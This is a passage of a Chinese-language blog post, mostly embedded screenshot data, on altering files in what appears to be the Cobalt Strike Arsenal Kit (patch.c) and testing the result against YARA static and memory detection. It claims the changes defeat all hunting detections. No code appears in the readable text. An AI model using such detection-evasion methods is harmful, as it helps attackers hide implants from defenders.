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
</p>
</li>
<li>
<p>/arsenal-kit/kits/artifact/src-common/patch.c</p>
<p>也是打乱一下结构</p>
<p><img loading=lazy src=data:image/png;base64,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
</p>
</li>
</ul>
<h2 id=0x04-效果测试>
 0x04 效果测试
 <a class=heading-link href=#0x04-%e6%95%88%e6%9e%9c%e6%b5%8b%e8%af%95>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h2>
<p>其实到了这一步已经能解决狩猎中的所有检测了</p>
<p><img loading=lazy src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABsQAAANFCAIAAABDdQ6fAAAgAElEQVR4nOyddWAUVxPAZ/fu4oE4JARJiOIQvNAWKRS34B6c9sOKU1pcS3F3C64JUpxCgUBwd00IEYjLye73xyaXy+3e3WbZTQ6Y35eP3r59b2ae7N7e7Lz3iICgigBA5/yfpgEIoGkAmgYAAKAp5j9AEwBAEwA0AUT2SX1oOlsKTVM0DTQFNEXRNK1RaygVrVHTGg1Fa2iKZpJpms7WRdPA6GT+l20Mo5cGyDUnx1aC+WDADAACAIDI+S8JBJCkDEiCJAlCRpIygpDLCIIAAJIkCCAIyPk/I1YrX++D7iELQmugNoUgdEwimKpmJ9I5/xC5ZbWmG4NtGxBAEEAT2rKMJiBIIqctCYLIVphtSvYhoWs1QeSc17FFa0+OUhqAyGMnkSOWyLGIJgiCzu0zIICgCSBoGnIaBHJGWq4KOlu41pbs8QQ6I4DW/odpOTpnrNJUZqKDg4uptkOQPGhHKZ1zLWnvYbmnmRsVTWekp+Z/jJElOs5b3+bJ2JA1d5Q5aYrAwetnVwgfOmx3NJWdy7nJ1OXj6miOjA/ZVWLyyr6qlQOmH4ujyBLtl66pHNZlyvEUw/c7IxT5ceKqflXluQmad4cnjdnzHDw6L15aObzPxOMppHe31bOcVvVcdl1FFKk7fM20n1yTTsxZDH0nVb355//m3yg3YU+/hPFD1jzUCDEAACzrTtozLuhTVLp9cfsHK/tN+9B186z2xUi9XOo7q7qPOhxLgXXtEVt/g8XLYHibF0PHXLCvWtZZpi+SViU8ufUyieJvhIVrhXrN27VvFwRXtyxfdvBhslPzvzb/cLHvhINxVmWb9h7er6Hrm/+OnTp17NS9OKL2+N3jG1ozdyVSJieBUmtYuui0s392WXRFyVJlEKsydX+s5EKSnj+EtJCfXnv6JQVAJcYWaTM58HiHyWczZS4NJszvl7K4/+JbmbISXZasHOBHaygAIGSylCPj+/wdqQKLupP29vow5pd1jzXymsN29v0w6tddb4T2DIIgCIIgCIIgSC55HEB6ybrpBAEgt02wYn6k0lr/XfbvapqmdN07uc4mxoNDMT5DABqApmg1TVMUraIoigaNhqJoDU1TFA0axnEIFE0DpfUVAkHRwDiXQOswzP75ToCOny0bXS9ejrV5qkgw7jSCIAgZyXgLSSBIgiBIgiRJGUHIAEjI8WoBDYSKAB0PAuh4C7UfiWwnao4bDgiCyHVrEtm+VZpDgLaptc5ZQt8PqfdZ74NxtKJoAJIgaMY0mtB1xuUaQescZbtiCZrO9grmGpFtI+gMg1xjiOx+YVoj15ep51gms9tE19DcyusOP86a0jkntB5HKjuJznZY5gwgrd+byk6glMbcywjCTe5LCq0vkeMlBq3Nnf8xRkWdDo/oPKBTw313jycwLinboJ9+cLi/6/x7rRfIsV7fvpUhJV1FkaW/b+h6e/Wf/8QxY59Sq9UanbtM/ki9sWVK9IHiDUaNqXz/7yXH3lOQlfCOApqwsbPOTE7KYm65miylkgIoUn3AoGov/7mkrgZF3B3e752/IiKFllMatUur6RsaqRmJ6vsbfpt2IjEf9ihvbx4/Yb/zdyOG+4avOxOnCdAo3+wYNmrjkzz+OVqjUlEARLEm7Wp+PPpHZFozlZqiZe412nRrU80949GjmEwAALAqHuCreHc9fPntl4n8bSAdKzdrUObDkSlDLjz6pAYLK2si8en1px/B0sqSijq3cdzVf4Ia/tS4nLvsn3s0fXPV4MGbSbn7j0Mm9fR6tWXxxshk/frSqtRPsTGq/IwHQu5Upnz1OhWCfB2SH121K1++IgCoo29Gq1UajWXxgAoeCmXcx6LlyzqTt97RFKXOvL5m/ML/0oH06zmvL0XRNABhbWNDpySlUMw7OHWWUi1kTCIIgiAIgiAIgrDIcSfleLUg10FH0zouRZoGkCc4ktpgwuzQOSBoivk1TWc7jrJDDTUURdE0TWk0tJqiNLRGQ9OUhtLQtAZoKjeGJ7usNrgHaKByAoAIACqPrSw/ofaQyJMEjI+JcRGSJCkjSZIgSSBJgiRkcuZzbhEqp5TGYDChfnQf6Hqxct1wWg+b9hSdJ56PccwRLBVsnQY8hboOSiPkujZZTjeapglCluvBy+OV1TnKHRFMiCCnN4/Q5snbODRXBXKGjI4jlchxaOZ8yIlXJFhK9A7ZefSdypDj9M6pWc5oAwAik6apfIQqIQjkCUik9f6rc8TETNM0CBljdPyFLftbzu/S87uIRf8mUGDp075b7azTf52I0Wgv/Mzkd/+uvE4EdyWynm0fNUSuUjO+O4rSqJVqiqIZt3q+oRLfPEpy8urkGH3pyPkHj9U5F5WVk5NN/IcEJU1RlIyAzEw1TdFgkXlr45LTZWZUVDzfu2ivmqZpAFKjVr4/sXz2/pfZMeqZnxKp/DVCypvHycGzaqXtnr7nhYqWU2qVulirP7cFldSJmAQq8fSMQetvF6vzg19mesIPfZqVtXBz7d7X9uraHdfmdE7YuCzsPQUApHvzP4ZbrJ6+/6E6X+3w/sTcSee/H7N7VS9KlRvI12TFjwAAQMgUxI3F/f/cnUoDAGR8fE/4th72v45+VhoioOOYuR1ZApXX5nWf/TJfIYEye9dSpQNKWSdcWT9l9uFnGQByn5ZD6tlYa1QqDe1aoUWHipaql1vWn3qnpmgZrVFnpSbERL9LpeWOiRkqhYaiKYpwcXHMio39qKEpAJKgM7NUFEXjbQ9BEARBEARBvhAIDqcQn4iyAoSJIYRsx5PWh6jnUiSq+pcnsuO/gJmbTGno6OQkWmgoDIIgCIIgCIIgCIIgCIIgXwcEQdgXcdR+lsdTNhpKQ1EajUat0RAKTZqllY2DoyvB5S9FEARBEARBEARBEARBEOTbgaZptVqVlZluZW1L0zTh5FBMQ2Vvh1LUsaiVtW1hW4ggCIIgCIIgCIIgCIIgiHmRmZEmV1gQFhalmbXAnJwJO3uHwrYKQRAEQRAEQRAEQRAEQRBzJDUlUU5R6cxCipZWLoVtD4IgCIIgCIIgCIIgCIIgZoqllY0caBkAFHEAuVxR2PYgCIIgCIIgCIIgCIIgCGKmyOUKOQUEANA0hTuuIAiCIAiCIAiCIAiCIAhiCIIg5Pb2CpIgADIL2xgEQRAEQRAEQRAEQRAE+TrJSE9NS0vKyEhXq5QAIFdYWFvb2NoWtbaxKxQ5pFsdwrMJuFQjrIsBAJ0eAwk3qHcn6NgrxgsSRVyCgKBlmign52JG8q1dvfj8+fPsdA8Pa78A65SXKbV+ViZ9As8UGbgorMrU8vUfka8KIAiCIAiCIAiCIAiCIMjXh0qZFRcXBQAubiXs7R0VCksAUKkyU5IT42OjCIJwcfNgEgtGDmFXWlbtT9qxIqVMplUZNK0GAIKQEwpr0qIIfLpD3ZhKp74xVFxuQcYDgMaUmvPnz0+fPgMIEmgKAEiStLQgypS0qlnHM+Ej+eSmb6N2vm/fn5u1s+qEviUplbVJuxEEQRAEQRAEQRAEQRDk6yYjIy025k2Jkj5OLsUActcYtJTZWFrZOLu6f4z/EP3umVvxUtbWtgUgB1yCyDoLNWo1lRqlm0zTalqZQilTSFsvWYOtmksj6YQbnALkGqUzAA1kNJ/60xTlbEl/VBKO1lDaBWISU968fZicBW7PH7056+BYy8vh6Zn1a9726aTkIw1BEARBEARBEARBEARBvlZUyqzYD2+9fSvZ2hflzEAQhLObu6W19cundz08vQ3FFYolh7ArLauzUK3MpDWZQJCceShVKk1Zyesu1JztyRmfSNKWybRVCmdhPWxldHAtdUhLigC6dBFVSRelUkPI5ERmIt27FrFhRUKpYldfa95UcFBtvsxHHoIgCIIgyDeLlddPQ/7ecTji1tV7104e2zy+mSf3w5zMO2T/g6vLmlsZF8dkW9Xa6FtoUHg2HLpsT9jlG1fvRBwPW/dLfScT++/J/Pvuiji9tnMJOS/5CIIgCIIgSB7
</p>
<p>yara静态检测</p>
<p><img loading=lazy src=data:image/png;base64,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
</p>
<p>yara内存检测</p>
<p><img loading=lazy src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABgQAAAD/CAIAAACxcyqwAAAgAElEQVR4nOzde1wVZeI/8M8AaldrL2kaHC4KpQKd2r7fBQVEMil37RsFuS2CaV4ycb9Lv2UppVhKLdZ22TbKvGSrSLsExX6zKLwgAgZ9a78dkbRQuZzDllp9v112N0vg/P6Yc5lzzsycO3Dk836522Gemed5ZuaZZ2aeeeYZoUPXBgDAjOt//MGRd8TfsdoEo/FlEBEREREREY0sWcOdAaJA8sGRd6QNPqIQ5bk1/s8SERERERERkRtmXD/cOSAKfEHDnQEiIiIiIiIiIho6bAwiIiIiIiIiIhpFFF8TG/mOHu/q1n/s8eKXXnzRjdfHXHH5ZUFBbBEjIiIiIiIiotEigBuDvv7Xd/N/eofROGAEBACA4w8A0p9vHXz3putjvv3ufPvxrulxkR+f7r7konHjxo0b0nwTEREREREREQ2fAG4MCgkOnviDywUYVecSBHNbkBFYevdco9EI4N/ipvR9cua0/rvz/f1sDCIiIiIiIiKi0SOQG4NCgq/43vc9Xvyyr/8JAEbHtqS+5hYkJ4V6njMiIiJSpa9cvhbFu7O9PNu2VlSG5XgbCREREdGoE8CNQYIgBAlofbvd8Pl5CEYBgABBMEIABOMVY4NnJ04DjH//+8cwvzgWHq7p6P78wecOvvLYHbJx6iuXz990VFtQk5w0pOviLjGf4m9tQY3dxXTz+oRVNeLPjM26wuShzh1RIOqryM2sT5ccTYaqRQvKdJI5rMeaShCAltLYvFqZ6TRMKnITStuBzLLNyF9VA8Tn163omZ9Xa6ohJftLlFXeVpzUV5GbWdou3YOtJdr8agDx+XW7FmpcSFdfWXoopTAnTPzLFKE5fmuE2oKy9Pp8aZC1hs8s6yhKdFLe5EI3osRyjoBsnpVLqeT8Ele4Z9vs3lYkJfZaTyv2cUrPRxIZm3WFMC9lt8riemmyl0bnHtZnK2/MltLYPKicxcSTnbagJkcpBjuGqkULyqJNmXGZZ0sRjQgOpzZVSpeXcoe5+hWmYxVqjiQ+vzCmrFShPiEioqEUwI1BoqCgi/Z9qBeCjEHBg0KI+f9DBmdOCv3yq6/HX35JcIhkHQVBOSYA0GRvq8PyteoztZSWoFD+olAlyHf0lcvn18+t023TAOLpdhEs51rTWb9DFyr+3lKZncx7USJn9JWV9Q4T08vbdisczkpB+srl87uXdugKAQCtJVrp4UnDI2dDfv06bCxK1KCmsLMEGxZqwlBXgEMphckAkgo7dIVAa4m2Kc16bxOas6stYn3Cqk2VzdnixMRiXU1UpSEnO9FZguYmD8QVpl